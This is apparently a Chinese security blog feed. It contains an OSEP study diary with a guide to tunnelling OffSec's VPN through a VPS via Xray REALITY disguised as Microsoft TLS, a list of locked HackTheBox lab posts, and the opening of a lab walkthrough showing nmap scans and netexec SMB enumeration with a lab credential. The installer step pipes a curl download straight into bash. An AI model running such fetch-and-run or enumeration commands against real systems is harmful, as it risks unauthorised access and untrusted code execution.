Wuthering Heights

OSEP-备考日记

呼啸山庄 — Thu, 07 May 2026 00:00:00 GMT

2026年5月7日（星期四）

母上的转账

今天下午上完课跟家里提出准备走谷安报名，税后价10900元，家母微信转了我12000元

三个月学习时长+一次考试机会，感觉容错率很低啊......如果再给我一次机会我会选择大二考证而不是大三

祝我好运吧....

HTB-Prolabs

在报名之前我已经完成了HTB-Prolabs的部分靶场

2026年5月8日（星期五-第一天）

Outlook-邮件

中午上完课回来发现邀请邮件已经发送过来了，效率好高啊

OffSec-Dashboard

OffSec-Course

VPN代理

适用场景：人在国内，直接连接 OffSec/OSEP VPN 延迟高、丢包明显，或者 UDP 到境外 VPN 服务器不稳定。
核心目标：让 Kali 最终仍然像“正常直连 OffSec VPN”一样工作，tun0、靶场动态路由、nmap、smbclient、xfreerdp 都在 Kali 本机使用；VPS 只负责把 OpenVPN 的 UDP 流量从更稳定的境外出口转发出去。

1. 网络架构

原始连接方式是：

Kali OpenVPN  ->  OffSec VPN

优化后的连接方式是：

Kali OpenVPN
    |
    | UDP 127.0.0.1:1195
    v
Kali 本地 Xray 客户端
    |
    | VLESS + REALITY over TCP 443
    v
海外 VPS Xray 服务端
    |
    | UDP 到 OffSec VPN
    v
vpn-pool2.offseclabs.com:1194

关键点：

OpenVPN 仍然运行在 Kali 上。
Kali 仍然拿到 OffSec 推送的 tun0 和真实靶场路由。
VPS 不长期连接 OffSec VPN，避免同一份 VPN 证书多点登录。
不写死靶场网段，例如不依赖 192.168.0.0/16。
不使用 /etc/hosts 劫持 OffSec 域名。
如果考试时 OffSec 发了新的 VPN 配置，只需要按新 .ovpn 的远端地址同步调整 Kali 侧配置。

2. 为什么不直接在 VPS 上挂 OpenVPN

把 OffSec VPN 直接挂在 VPS 上，再从 Kali 走 SSH 隧道或路由转发，看起来能临时访问靶机，但问题很多：

OffSec VPN 的路由是动态推送的，考试或靶场重置后网段可能变化。
xfreerdp、nmap、smbclient 等工具最好直接走 Kali 的 tun0。
同一份 .ovpn 同时在 VPS 和 Kali 上连接，可能出现会话冲突。
后续排障会变复杂，很难判断是 OpenVPN、转发、NAT 还是路由的问题。

所以更稳定的思路是：Kali 本机挂 VPN，VPS 只当网络前置代理。

3. VPS 侧配置：Xray 服务端

VPS 使用 Debian，公网 IP 用 <VPS_IP> 代替。SSH 端口建议不要用默认的 22，例如改成 22222。

3.1 安装 Xray

bash -c "$(curl -L https://github.com/XTLS/Xray-install/raw/main/install-release.sh)" @ install

检查版本：

xray version

3.2 生成 UUID 和 REALITY 密钥

xray uuid
xray x25519
openssl rand -hex 8

分别记录：

uuid
REALITY Private key
REALITY Public key
shortId

博客里不要公开真实值，可以写成：

UUID: <UUID>
Private key: <REALITY_PRIVATE_KEY>
Public key: <REALITY_PUBLIC_KEY>
shortId: <SHORT_ID>

3.3 配置服务端

编辑：

nano /usr/local/etc/xray/config.json

示例配置：

{
  "log": {
    "loglevel": "warning"
  },
  "inbounds": [
    {
      "listen": "0.0.0.0",
      "port": 443,
      "protocol": "vless",
      "settings": {
        "clients": [
          {
            "id": "<UUID>",
            "flow": ""
          }
        ],
        "decryption": "none"
      },
      "streamSettings": {
        "network": "tcp",
        "security": "reality",
        "realitySettings": {
          "show": false,
          "dest": "www.microsoft.com:443",
          "xver": 0,
          "serverNames": [
            "www.microsoft.com"
          ],
          "privateKey": "<REALITY_PRIVATE_KEY>",
          "shortIds": [
            "<SHORT_ID>"
          ]
        }
      }
    }
  ],
  "outbounds": [
    {
      "protocol": "freedom",
      "tag": "direct"
    }
  ]
}

启动并设置开机自启：

systemctl enable --now xray
systemctl restart xray

检查：

systemctl status xray --no-pager -l
ss -tlnp | grep ':443'

正常应该看到 Xray 正在运行，并监听 0.0.0.0:443。

3.4 VPS 安全组

在云厂商控制台放行：

TCP 443 入站
TCP 22222 入站，或你自己的 SSH 端口

不需要长期放行 UDP 1194，因为最终不是让 VPS 当 OpenVPN relay。

4. Kali 侧配置：Xray 客户端

4.1 安装 Xray

bash -c "$(curl -L https://github.com/XTLS/Xray-install/raw/main/install-release.sh)" @ install

检查：

xray version

4.2 配置 Kali 本地 UDP 入口

创建配置文件：

nano /usr/local/etc/xray/offsec-client.json

示例配置：

{
  "log": {
    "loglevel": "warning"
  },
  "inbounds": [
    {
      "listen": "127.0.0.1",
      "port": 1195,
      "protocol": "dokodemo-door",
      "settings": {
        "address": "vpn-pool2.offseclabs.com",
        "port": 1194,
        "network": "udp"
      },
      "tag": "offsec-udp-in"
    }
  ],
  "outbounds": [
    {
      "protocol": "vless",
      "settings": {
        "vnext": [
          {
            "address": "<VPS_IP>",
            "port": 443,
            "users": [
              {
                "id": "<UUID>",
                "encryption": "none",
                "flow": ""
              }
            ]
          }
        ]
      },
      "streamSettings": {
        "network": "tcp",
        "security": "reality",
        "realitySettings": {
          "serverName": "www.microsoft.com",
          "fingerprint": "chrome",
          "publicKey": "<REALITY_PUBLIC_KEY>",
          "shortId": "<SHORT_ID>",
          "spiderX": "/"
        }
      },
      "tag": "vps"
    }
  ]
}

这里最重要的是 inbound：

"listen": "127.0.0.1",
"port": 1195,
"address": "vpn-pool2.offseclabs.com",
"port": 1194,
"network": "udp"

含义是：Kali 本地开放 127.0.0.1:1195/udp，收到 OpenVPN 流量后，由 Xray 通过 VPS 发往 OffSec 官方 VPN 地址。

4.3 创建 systemd 服务

创建：

nano /etc/systemd/system/xray-offsec-client.service

内容：

[Unit]
Description=Xray client for OffSec OpenVPN UDP proxy
After=network-online.target
Wants=network-online.target

[Service]
Type=simple
ExecStart=/usr/local/bin/xray run -config /usr/local/etc/xray/offsec-client.json
Restart=on-failure
RestartSec=3
LimitNOFILE=1048576

[Install]
WantedBy=multi-user.target

启动并设置开机自启：

systemctl daemon-reload
systemctl enable --now xray-offsec-client
systemctl restart xray-offsec-client

检查：

systemctl status xray-offsec-client --no-pager -l
ss -ulnp | grep 1195

正常应该看到：

127.0.0.1:1195

5. OpenVPN 配置

不要直接改原始 .ovpn，先复制一份：

cd /home/kali/Desktop/OSEP/VPN
cp "universal.ovpn" universal-vpsproxy.ovpn

编辑副本：

nano universal-vpsproxy.ovpn

找到原来的 remote 行，例如：

remote vpn-pool2.offseclabs.com 1194 udp

改成：

remote 127.0.0.1 1195 udp

保留证书校验配置，例如：

verify-x509-name "offensive-security.com" name

然后连接：

openvpn --config "/home/kali/Desktop/OSEP/VPN/universal-vpsproxy.ovpn"

正常日志应包含：

UDPv4 link remote: [AF_INET]127.0.0.1:1195
Initialization Sequence Completed

这说明 OpenVPN 已经从 Kali 本机连上，只是底层 UDP 流量经由 VPS 出口转发到了 OffSec VPN。

6. 验证靶场路由

VPN 连上后检查：

ip addr show tun0
ip route

应该能看到 tun0，以及 OffSec 推送下来的真实靶场路由，例如：

192.168.106.0/24 via 192.168.45.254 dev tun0

注意：这个网段只是示例。考试或不同 lab 里可能不是这个，所以不要在配置里写死它。

7. 每次开机后怎么连

如果已经把 xray-offsec-client 设置为开机自启，通常只需要：

systemctl status xray-offsec-client --no-pager -l
openvpn --config "/home/kali/Desktop/OSEP/VPN/universal-vpsproxy.ovpn"

如果 Xray 没启动：

systemctl restart xray-offsec-client

如果 OpenVPN 没连上，先看三件事：

ss -ulnp | grep 1195
systemctl status xray-offsec-client --no-pager -l
ping -c 4 <VPS_IP>

8. 如果考试发了新的 VPN 文件，应该改哪里

大多数情况下，VPS 不用动，只改 Kali。

8.1 新 VPN 仍然是同一个官方域名

如果新 .ovpn 里还是：

remote vpn-pool2.offseclabs.com 1194 udp

只需要复制新文件，然后把副本的 remote 改成本地 Xray：

cp new-exam.ovpn new-exam-vpsproxy.ovpn
sed -i -E 's/^remote .+ 1194 udp$/remote 127.0.0.1 1195 udp/' new-exam-vpsproxy.ovpn
openvpn --config ./new-exam-vpsproxy.ovpn

8.2 新 VPN 换了官方域名

先查看新文件里的 remote：

grep '^remote ' new-exam.ovpn

假设看到：

remote vpn-pool3.offseclabs.com 1194 udp

那 Kali 需要改两处：

第一处，改 Xray 客户端目标：

nano /usr/local/etc/xray/offsec-client.json

把：

"address": "vpn-pool2.offseclabs.com"

改成：

"address": "vpn-pool3.offseclabs.com"

然后重启：

systemctl restart xray-offsec-client

第二处，复制新的 .ovpn，把 remote 改成本地：

cp new-exam.ovpn new-exam-vpsproxy.ovpn
sed -i -E 's/^remote .+ 1194 udp$/remote 127.0.0.1 1195 udp/' new-exam-vpsproxy.ovpn
openvpn --config ./new-exam-vpsproxy.ovpn

8.3 新 VPN 端口也变了

如果新 .ovpn 里是：

remote <NEW_VPN_HOST> <NEW_PORT> udp

则 Kali 的 /usr/local/etc/xray/offsec-client.json 也要同步改：

"address": "<NEW_VPN_HOST>",
"port": <NEW_PORT>,
"network": "udp"

然后：

systemctl restart xray-offsec-client

.ovpn 副本仍然改成：

remote 127.0.0.1 1195 udp

也就是说：

Xray 客户端负责记住真实 OffSec VPN 地址。
OpenVPN 永远只连 127.0.0.1 1195 udp。

课程进度

2026年5月9日（星期六-第二天）

课程进度

白天美美的休息了，下午学了一阵然后打瓦去了

个人感受

感觉购买前准备的还是太充分了，又臭又长的pdf文档在购买前我已经啃完了一半，ai搭建的知识库我也都过了一遍，这导致我处于速通状态，后悔没早点买了

笔记整理

主要分为俩个部分，一个是course笔记：用于汇总章节内容和处理章节习题等

另一个是code笔记，提取章节内有用的代码进行汇总整理，方便二次查阅使用代码

格式大概就是这样：章节标题写成英文确实看着挺高级，但也是真的容易让我发晕

2026年5月10日（星期日-第三天）

课程进度

预计明天就能结束，借助ai速通了一遍

ai skill

结合我之前的笔记格式用ai写了个skill，现在只需要把文章内容喂进去，ai就能直接给我提炼文章另其通俗易懂，同时提取章节实践代码及流程，对此我还让它专门另写一个章节指南，写出考试环境下遇到不同场景时该如何判断运用代码的指南，对此我非常满意，极大提高学习效率，不必再手动整理，解放了！

2026年5月11日（星期一-第四天）

课程进度

基本结束了，准备明天复习一天然后后天开始靶场环节

个人感受

很庆幸在学之前打完了大多数htb-prolabs，课程原理看的我头发蒙但是的确很多攻击向量在prolabs曾被利用训练过

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/osep/osep-%E5%A4%87%E8%80%83%E6%97%A5%E8%AE%B0/

HTB-Puppet

呼啸山庄 — Fri, 01 May 2026 12:56:48 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/puppet/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/puppet/

HTB-Mythical

呼啸山庄 — Fri, 01 May 2026 07:01:24 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/mythical/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/mythical/

HTB-FullHouse

呼啸山庄 — Thu, 30 Apr 2026 16:49:58 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/fullhouse/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/fullhouse/

HTB-Odyssey

呼啸山庄 — Wed, 29 Apr 2026 19:10:48 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/odyssey/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/odyssey/

HTB-RPG

呼啸山庄 — Wed, 29 Apr 2026 15:33:48 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/rpg/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/rpg/

HTB-Control

呼啸山庄 — Tue, 28 Apr 2026 19:32:38 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/control/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/control/

HTB-Hades

呼啸山庄 — Tue, 28 Apr 2026 14:28:50 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/hades/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/hades/

HTB-Intercept

呼啸山庄 — Tue, 28 Apr 2026 08:56:47 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/intercept/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/intercept/

HTB-Push

呼啸山庄 — Tue, 28 Apr 2026 04:53:13 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/push/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/push/

HTB-Trusted

呼啸山庄 — Mon, 27 Apr 2026 14:05:09 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/trusted/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/trusted/

HTB-Klendathu

呼啸山庄 — Mon, 27 Apr 2026 08:27:06 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/klendathu/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/klendathu/

HTB-Sidecar

呼啸山庄 — Sun, 26 Apr 2026 13:37:28 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/sidecar/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/sidecar/

HTB-Tea

呼啸山庄 — Sun, 26 Apr 2026 06:10:01 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/tea/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/tea/

HTB-Heron

呼啸山庄 — Sat, 25 Apr 2026 20:23:20 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/heron/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/heron/

HTB-Reflection

呼啸山庄 — Sat, 25 Apr 2026 14:19:39 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/reflection/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/reflection/

HTB-Tengu

呼啸山庄 — Sat, 25 Apr 2026 05:23:55 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/tengu/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/tengu/

HTB-Cybernetics

呼啸山庄 — Thu, 23 Apr 2026 19:10:20 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/cybernetics/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/cybernetics/

MazeSec-lookback

呼啸山庄 — Fri, 10 Apr 2026 00:00:00 GMT

靶机信息

详情

靶机：lookback

作者：wackymaker (QQ: 3456458902)

靶机ID: 632

系统：Windows（ad）

难度：hard

链接：https://mega.nz/file/GxgggYIR#T4gVR6wA9A3zy7r9qzo0gzxAzgIHI-_yURnsng-4tNw

链接：https://pan.baidu.com/s/1fpP1MyMAyyxe1hLrBG_LGg?pwd=7qgb

初始凭证：hank\HrUhoX2r6c7Jgxg2qiTY

启动（失败）

配置

彻底关机 **lookback**

在 **Storage** 里只做删除，不做新增

找到 **NVMe Controller** 下的 **lookback-disk1.vdi**

点“Remove Attachment”

保存

重新打开设置，确认 **NVMe** 下已经空了

再把这块盘添加到 **SATA Controller -> Port 0**

IP地址

┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
└─# arp-scan --interface=eth1 --localnet | grep "08:00:27"  
172.16.55.128   08:00:27:2f:a0:3b       PCS Systemtechnik GmbH

信息收集

rustscan

┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
└─# rustscan -a 172.16.55.128 -- -A
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Where '404 Not Found' meets '200 OK'.

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 172.16.55.128:445
Open 172.16.55.128:1433

同步时间

┌──(web)─(root㉿kali)-[/home/kali]
└─# nmap -p 445 --script smb2-time 172.16.55.128
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-11 13:40 +0800
Nmap scan report for dc01.lookback.htb (172.16.55.128)
Host is up (0.00027s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 08:00:27:2F:A0:3B (Oracle VirtualBox virtual NIC)

Host script results:
| smb2-time: 
|   date: 2026-04-11T06:01:38
|_  start_date: N/A

Nmap done: 1 IP address (1 host up) scanned in 1.25 seconds

sudo timedatectl set-timezone UTC
sudo date -s "2026-04-11 06:01:38"

enum4linux-ng

┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
└─# rustscan -a 172.16.55.128 -- -A
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Where '404 Not Found' meets '200 OK'.

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 172.16.55.128:445
Open 172.16.55.128:1433
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 172.16.55.128
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-11 11:47 +0800
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:47
Completed NSE at 11:47, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:47
Completed NSE at 11:47, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:47
Completed NSE at 11:47, 0.00s elapsed
Initiating ARP Ping Scan at 11:47
Scanning 172.16.55.128 [1 port]
Completed ARP Ping Scan at 11:47, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:47
Completed Parallel DNS resolution of 1 host. at 11:47, 4.50s elapsed
DNS resolution of 1 IPs took 4.50s. Mode: Async [#: 3, OK: 0, NX: 0, DR: 1, SF: 0, TR: 6, CN: 0]
Initiating SYN Stealth Scan at 11:47
Scanning 172.16.55.128 [2 ports]
Discovered open port 445/tcp on 172.16.55.128
Discovered open port 1433/tcp on 172.16.55.128
Completed SYN Stealth Scan at 11:47, 0.01s elapsed (2 total ports)
Initiating Service scan at 11:47
Scanning 2 services on 172.16.55.128
Completed Service scan at 11:47, 6.02s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 172.16.55.128
Retrying OS detection (try #2) against 172.16.55.128
NSE: Script scanning 172.16.55.128.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:48
NSE Timing: About 99.65% done; ETC: 11:48 (0:00:00 remaining)
Completed NSE at 11:48, 40.04s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:48
Completed NSE at 11:48, 0.05s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:48
Completed NSE at 11:48, 0.00s elapsed
Nmap scan report for 172.16.55.128
Host is up, received arp-response (0.00036s latency).
Scanned at 2026-04-11 11:47:53 CST for 50s

PORT     STATE SERVICE       REASON          VERSION
445/tcp  open  microsoft-ds? syn-ack ttl 128
1433/tcp open  ms-sql-s      syn-ack ttl 128 Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   172.16.55.128:1433: 
|     Target_Name: LOOKBACK
|     NetBIOS_Domain_Name: LOOKBACK
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: lookback.htb
|     DNS_Computer_Name: dc01.lookback.htb
|     DNS_Tree_Name: lookback.htb
|_    Product_Version: 10.0.20348
|_ssl-date: 2026-04-11T03:57:19+00:00; +8m36s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-04-11T03:52:01
| Not valid after:  2056-04-11T03:52:01
| MD5:     7474 440a 16ce 3fac dfe7 9c40 1237 c0fc
| SHA-1:   98b5 8200 df9f cf7c c7fa 7481 62b8 895c b5b8 4634
| SHA-256: 258a 88d1 3b16 1c42 a05e c7d7 ea41 b3da fee5 7ee2 cc7d dcb6 ee04 ae2f 5885 8c54
| -----BEGIN CERTIFICATE-----
| MIIEADCCAmigAwIBAgIQGm3HGZvOj5VCSzUQsQ5msDANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjYwNDExMDM1MjAxWhgPMjA1NjA0MTEwMzUyMDFaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCAaIwDQYJKoZIhvcNAQEBBQADggGPADCCAYoCggGBAPUHgbuD
| bBc5qBelr4X1WCI1KsW3GRBACa60P5AzaQwfTr2h0IdYNvurfgAmQtyvXjaPoJIT
| CJ4ssEQRJZ0wf6m7xsphUyBV3G2yPFNtYb7aPXv7qhKO4imjbeGVT638HZLYFMgs
| CTIsqIpP+910po23zNwZsEB6Y/vhAtx4aswg4RHV0SpB6dEVwNElsCEuQ5rFnZAu
| m3hRa/+lYCQHadfwEVG25RRWMSywSAz6hJ/4OlkWcXO15M4sZUefQWM5VE/xKeUc
| yVhEv2G7xTwnJ5vqWyxz+IvnibUc6WRUqZwQof1fyjey2fPGIAC/V27pNrnPvl1a
| mOUdZpVwI3Lt0CBvDMAIGKQoBnc4jtuBLde4JRtDuFJHTp+0H1MRypV1bFF6wfcW
| byu/mxmTNfQdPPct11lCEF22kWtmf/AVtW92N89uBlv46xiBoeepYjTyVFmGNBtm
| vdl4zopzGp0hF9lKaxDDGPJ/RBvE/bBlr/XgoEhkAZsNgmCGSIeSH0COLQIDAQAB
| MA0GCSqGSIb3DQEBCwUAA4IBgQCWBFp9iElHXo55braQc+d4qgg9qb773LOcW96R
| WUoKFRn+L5xH8pCSx1CS8iTs3aUa0S5xwtoCsRXGZIVSXqbaqBfyQSgtm3fJuGPH
| dPYz6h2P7KFJUOxBgdiH/xhL/7w8TTdq4x6X4V9q6gqXOEL33+ygV4lupiKCqXWh
| zfgOiXADf+1fwN6Kq3E6mkwA03K3s9bcAsu7GfmiKHx0nBIuNZMa2wup4rHp+kyT
| e5UNbvhtTn5nnbzWZgVoTJWxDTZgxqdh9o8pZquH0s5PH48Ze2qVZjavd3hyEX09
| I0I3O4kWqNqz8jhLM53OHR+fz1FHfLRfFSmAYPloFYZAw7/bTn6ERZNjBvRoRm7J
| M5E6WzdXd2AwFGUmcYdtdN2pW9T+0ki55L9qDOAcLCUMfYqEl2Au55IhNyyWJNgX
| leMTjln6ZLV/Yej/GieHtUlU5Q18hMHmzoMD3I68ig6BhmZVBtrlF028Pp67/z/z
| rqikA3uC/zht8YXVSceyw/EVr0Q=
|_-----END CERTIFICATE-----
| ms-sql-info: 
|   172.16.55.128:1433: 
|     Version: 
|       name: Microsoft SQL Server 2022 RTM
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
MAC Address: 08:00:27:2F:A0:3B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_11 cpe:/o:microsoft:windows_server_2016
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2022 (92%), Microsoft Windows 11 21H2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.98%E=4%D=4/11%OT=445%CT=%CU=%PV=Y%DS=1%DC=D%G=N%M=080027%TM=69D9C49B%P=x86_64-pc-linux-gnu)
SEQ(SP=F3%GCD=1%ISR=FB%TI=I%TS=A)
SEQ(SP=FF%GCD=1%ISR=10C%TI=I%TS=A)
OPS(O1=M5B4NW8ST11%O2=M5B4NW8ST11%O3=M5B4NW8NNT11%O4=M5B4NW8ST11%O5=M5B4NW8ST11%O6=M5B4ST11)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M5B4NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=N)

Uptime guess: 0.005 days (since Sat Apr 11 11:41:08 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=243 (Good luck!)
IP ID Sequence Generation: Incremental

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 20036/tcp): CLEAN (Timeout)
|   Check 2 (port 63241/tcp): CLEAN (Timeout)
|   Check 3 (port 42841/udp): CLEAN (Timeout)
|   Check 4 (port 42527/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-04-11T03:56:38
|_  start_date: N/A
|_clock-skew: mean: 8m32s, deviation: 2s, median: 8m31s

TRACEROUTE
HOP RTT     ADDRESS
1   0.36 ms 172.16.55.128

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:48
Completed NSE at 11:48, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:48
Completed NSE at 11:48, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:48
Completed NSE at 11:48, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.53 seconds
           Raw packets sent: 89 (9.036KB) | Rcvd: 17 (932B)

添加hosts

┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
└─# echo "172.16.55.128 dc01.lookback.htb lookback.htb dc01" | sudo tee -a /etc/hosts 
172.16.55.128 dc01.lookback.htb lookback.htb dc01

netexec

smb(shares)

┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
└─# nxc smb 172.16.55.128 -d lookback.htb -u hank -p 'HrUhoX2r6c7Jgxg2qiTY' --shares
SMB         172.16.55.128   445    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         172.16.55.128   445    DC01             [+] lookback.htb\hank:HrUhoX2r6c7Jgxg2qiTY 
SMB         172.16.55.128   445    DC01             [*] Enumerated shares
SMB         172.16.55.128   445    DC01             Share           Permissions     Remark
SMB         172.16.55.128   445    DC01             -----           -----------     ------
SMB         172.16.55.128   445    DC01             ADMIN$                          Remote Admin
SMB         172.16.55.128   445    DC01             C$                              Default share
